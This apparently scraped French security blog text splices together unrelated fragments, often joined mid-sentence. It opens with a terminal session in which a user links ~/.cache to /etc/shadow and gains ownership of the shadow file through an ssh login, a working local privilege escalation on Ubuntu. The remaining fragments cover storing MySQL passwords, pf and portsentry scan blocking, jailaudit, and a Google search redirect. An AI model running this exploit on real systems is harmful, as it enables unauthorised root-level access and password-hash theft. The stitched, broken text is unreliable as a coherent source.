cloud@pentest:~$ ls -l /etc/shadow -rw-r----- 1 root root 1362 2010-07-08 19:31 /etc/shadow cloud@pentest:~$ rm -rf .cache cloud@pentest:~$ ln -s /etc/shadow .cache cloud@pentest:~$ ssh localhost cloud@localhost's password: Linux pentest 2.6.31-22-generic #60-Ubuntu SMP Thu May 27 00:22:23 UTC 2010 i686 To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ .................. .................. Last login: Thu Jul 8 20:47:58 2010 from localhost cloud@pentest:~$ ls -l /etc/shadow -rw-r----- 1 cloud cloud 1362 2010-07-08 19:31 /etc/shadowMettez a jour votre distrib.
client ------- RP Apache (mod_proxy + mod_security) ---------- Nginx1er test pour etre sur que le problème vient de Joomla, j'ajoute une page vide dans le répertoire du site et je test d'y accéder avec succès. Le problème vient donc bien du CMS.
* Since we are assigning the URI from the server variables, we first need
* to determine if we are running on apache or IIS. If PHP_SELF and REQUEST_URI
* are present, we will assume we are running on apache.
*/
if (!empty ($_SERVER['PHP_SELF']) && !empty ($_SERVER['REQUEST_URI'])) {
/*
* To build the entire URI we need to prepend the protocol, and the http host
* to the URI string.
*/
$theURI = 'http' . $https . 'www.site-public.com' . $_SERVER['REQUEST_URI'];
Have fun.
SetEnv passmysql "voicilepass"Pour se connecter à MySQL, il suffira alors de mettre dans son code PHP la ligne suivante :
$con = mysql_connect($host, $login, $_SERVER['passmysql']);Le pass ne sera donc plus dans le code ce qui est un peu mieux. L'inconvénient est que le pass est toujours visualisable si le pirate fouille un peu et va voir dans la conf d'Apache. De plus le pass apparaitra dans le phpinfo() car cette fonction récapitule les variables d'environnement Apache.
<?php
$pass_mysql = "mot_de_passe";
$shm_id = shm_attach(1);
if ($shm_id === false)
{
echo "Fail to attach shared memory.\n";
}
//On ajoute $pass_mysql dans la memoire partagee
if (!shm_put_var($shm_id, $pass_mysql, $pass_mysql))
{
echo "Failed to put var 1 in shared memory $shm_id.\n";
}
?>
Maintenant que le mot de passe est partagé, nous pouvons supprimer le fichier :
# rm launch.phpCréons ensuite le fichier de connexion à MySQL qui utilisera alors la variable stockée dans la mémoire partagée :
<?php
$shm_id = shm_attach(1);
if ($shm_id === false)
{
echo "Fail to attach shared memory.\n";
}
//Recuperation du pass mysql dans la memoire partagee
$pass = shm_get_var($shm_id, $pass_mysql);
$con = mysql_connect('localhost', 'root', $pass);
mysql_select_db('test');
$req = "select * from `table` where id=1";
$res = mysql_query($req);
$ligne = mysql_fetch_array($res);
echo $ligne['nom'];
?>
Et voila nous avons une configuration opérationnelle et qui permet de ne pas stocker dans un fichier en clair le pass de sa base
de donnée MySQL.
Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol.Cela indique donc clairement qu'un Referer ne doit pas etre envoyé dans une requete HTTP sécurisée.
table <antiscan> persist block in quick from <antiscan>Nous avons donc ici créé une table appelée antiscan qui bloquera immédiatement (quick) toutes les IP contenues dedans.
#pfctl -f /etc/pf.confNous allons ensuite configuré portsentry afin que celui ci bloque immédiatement une IP tentant de se connecter à un port surveillé.
KILL_RUN_CMD="pfctl -t antiscan -T add $TARGET$"On redémarre portsentry.
[cloud@r00t ~]$ ssh site_cible.com ssh_exchange_identification: Connection closed by remote hostObservons maintenant la table antiscan du serveur site_cible.com
site_cible.com# pfctl -t antiscan -T show 82.168.247.31Mon IP apparait bien dans la table et est donc maintenant bloqué.
http://www.google.com/search?hl=fr&domains=blog.madpowah.org&sitesearch=blog.madpowah.org&q=freebsd+apache&btnG=Rechercher&sitesearch=blog.madpowah.orgIl faut mettre le nom de son site pour les variables domains et sitesearch et mettre à la variable q sa recherche en remplacant les espaces par des +
<?php
if (isset($_POST["ok"])){
if ($_POST["ok"] === "ok") {
$search = trim(htmlspecialchars($_POST["search"]));
$search = str_replace(" ", "+", $search);
$url = 'http://www.google.com/search?hl=fr&domains=blog.madpowah.org&sitesearch=blog.madpowah.org&q=' . $search . '&btnG=Rechercher';
header('Location: ' . $url);
}
}
?>
<form action="google.php" method="POST">
<input type="text" name="search" />
<input type="submit" name="ok" value="ok" />
</form>
Vous avez maintenant le plus puissant des moteurs de recherche sur votre site :)
systeme_hote# jailaudit generate
Downloading a current audit database:
auditfile.tbz 100% of 60 kB 69 kBps
New database installed.
Database created: Sun Apr 25 19:50:01 CEST 201
La commande va générer un fichier de rapport poru chaque jail et le stocker dans /usr/local/jailaudit/reports/. On va alors
envoyer ses rapports à l'adresse de notre choix via la commande jailaudit mail :
systeme_hote# jailaudit mail - ALL portaudit for jails on systeme_hote - 6 problem(s) found. portaudit for jail: jail1 (JID: 2) Affected package: xxxxxxxx ................ 2 problem(s) found. portaudit for jail: jail2 (JID: 1) .........Le "-" va afficher sur stdout le résultat. Pour envoyer un email, il suffit de le remplacer par une adresse :
systeme_hote# jailaudit mail email@domaine.com ALLOn met tout ça dans un cron et c'est automatisé :)
rdr on $ext_if proto tcp from any to any port 443 -> 192.168.1.30 port 993Bien sur tout cela impose d'avoir son propre serveur de mail pour effectuer cette redirection. Il serait également possible de modifier le port du serveur imap ssl.